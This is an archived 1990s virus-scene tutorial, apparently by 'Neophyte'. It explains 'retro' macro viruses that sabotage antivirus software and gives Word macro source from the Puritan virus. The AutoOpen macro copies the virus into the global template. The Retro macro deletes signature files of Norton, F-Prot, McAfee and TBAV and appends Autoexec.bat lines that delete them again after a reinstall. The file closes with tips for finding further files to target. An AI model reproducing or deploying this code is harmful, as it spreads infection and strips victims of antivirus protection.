home *** CD-ROM | disk | FTP | other *** search

---

/ Collection of Hack-Phreak Scene Programs / cleanhpvac.zip / cleanhpvac / CCTX0497.ZIP / VBBUPDT2.ZIP / VBB-4.ZIP / VBB-4.018

< prev

next >

Wrap

Text File  |  1997-01-19  |  5KB  |  145 lines

---

1. RETRO MACRO VIRII
2. =================
3.  
4. This file shows you how to defeat the most known anti virus products out
5. there. This technique isn't for using against TSR-AV products. If anyone
6. knows or has an idea about how to defeat TSR products, e-mail me at
7. The_Neophyte@hotmail.com
8. Ok, now for the real code and techniques.  I will present parts  of code
9. I first used in my Puritan (1)  virus.   Because this is the only  macro
10. virus that uses this technique till now.
11. The actual working of  the retro macro is that it deletes  the signature
12. from the most known AV-products,  so if the AV-prog is started later you
13. will get a message like "Virus Signatures corrupt,  please reinstall the
14. program." So the most of the not knowing people out there will reinstall
15. the program. But if a anti virus proggie for Windows 95  is installed it
16. will most of the time need a reboot for completing the total install. So
17. if we put a line in Autoexec.bat such as
18. "If exist C:\TBAV\TBscan.sig then del C:\TBAV\TBscan.sig"
19. Ok, got the point? Now for the code:
20.  
21. ------Autoopen Macro----------------------------------------------------
22. Sub MAIN
23.         On Error Goto Z                         '<This must be familiar
24.         iM = CountMacros(0, 0)                  ' to you.>
25.     For i = 1 To M
26.         If M$(i, 0, 0) = "Puritan" Then Y = - 1
27.         End If
28.     Next i
29.  
30.     If Not Y Then
31.                 F$ = WindowName$()
32.     S$ = F$ + ":Puritan"
33.                 MacroCopy S$, "Global:Puritan"
34.     S$ = F$ + ":Rtr"
35.                 MacroCopy S$, "Global:Retro"
36.     S$ = F$ + ":FSAB"
37.                 MacroCopy S$, "Global:FileSaveAs"
38.     S$ = F$ + ":FSAB"
39.                 MacroCopy S$, "Global:FSAB"
40.     S$ = F$ + ":AOB"
41.                 MacroCopy S$, "Global:AOB"
42.     S$ = F$ + ":ToolsMacro"
43.                 MacroCopy S$, "Global:ToolsMacro"
44.     End If
45.  
46. ToolsMacro .Name = "Retro", .Run, .Show = 0, .Discription = "", .NewName = ""
47.                         '<This runs the macro Retro from the Normal.dot
48.                           when the Normal.dot is infected. So it will
49.                           normally will be run once every infection.>
50.  
51. Z:
52.  
53. End Sub
54.  
55.  
56. ------Retro Macro-------------------------------------------------------
57. Sub MAIN
58.  On Error Goto a                             '<Build in error handler.>
59. VF$ = "C:\Program Files\Norton AntiVirus\Virscan.Dat"
60.                                              '<VF$ = Virscan.dat file>
61. If Files$(VF$) = "" Then Goto a              '<If it doesn't exists goto a>
62. SetAttr VF$, 0                               '<Set file attributes to none.>
63. Kill VF$                                     '<Delete VF$>
64.                 
65. a:                                              
66.  On Error Goto c
67. AB$ = "C:\Autoexec.bat"                      '<AB$ = Autoexec.bat>
68. If Files$(AB$) = "" Then Goto c              '<If it doesn't exists goto c>
69. SetAttr AB$, 0                               '<set file attributes to none.>
70.  
71. Open AB$ For Append As #1                    '<Open AutoExec.bat for appending
72. Print #1, "@echo off"                          the line IF exist C:\...\virscan.dat 
73. Print #1, "IF exist " + VF$ + " then del " + VF$
74. Close #1                                       at the end of the AutoExec.bat>
75.  
76.  
77. c:                                           '<Practically the same routine,
78.  On Error Goto d                               onlt now with other names.>
79. VF$ = "C:\Program Files\F-Prot95\Fpwm32.dll"
80. If Files$(VF$) = "" Then Goto d
81. SetAttr VF$, 0
82. Kill VF$
83.                 
84. d:
85. AB$ = "C:\Autoexec.bat"
86. If Files$(AB$) = "" Then Goto f
87. SetAttr AB$, 0
88. Open AB$ For Append As #1
89. Print #1, "IF exist " + VF$ + " then del " + VF$
90. Close #1
91.  
92.  
93. f:
94.  On Error Goto g
95. VF$ = "C:\Program Files\McAfee\Scan.dat"
96. If Files$(VF$) = "" Then Goto g
97. SetAttr VF$, 0
98. Kill VF$
99.                 
100. g:
101. AB$ = "C:\Autoexec.bat"
102. If Files$(AB$) = "" Then Goto h
103. SetAttr AB$, 0
104. Open AB$ For Append As #1
105. Print #1, "IF exist " + VF$ + " then del " + VF$
106. Close #1
107.  
108.  
109. h:
110.  On Error Goto i
111. VF$ = "C:\Tbavw95\Tbscan.sig"
112. If Files$(VF$) = "" Then Goto i
113. SetAttr VF$, 0
114. Kill VF$
115.                 
116. i:
117. AB$ = "C:\Autoexec.bat"
118. If Files$(AB$) = "" Then Goto j
119. SetAttr AB$, 0
120. Open AB$ For Append As #1
121. Print #1, "IF exist " + VF$ + " then del " + VF$
122. Close #1
123.  
124. J:
125. End Sub
126.  
127. ------------------------------------------------------------------------
128.  
129. Quite simple, he?
130. This retro macro only works with the Win95 AV products,  but if you want
131. a more complete retro technique, that also includes the DOS and WIN 3.11
132. AV files,  just install the AV-proggie and rename a file (Not the .exe).
133. And run the proggie, see if it still works.  And if it doesn't,  you got
134. the right file.
135.  
136.                      --- Neophyte ---
137. The_Neophyte@Hotmail.com
138.  
139.  
140.  
141.  
142.  
143.  
144.  
145.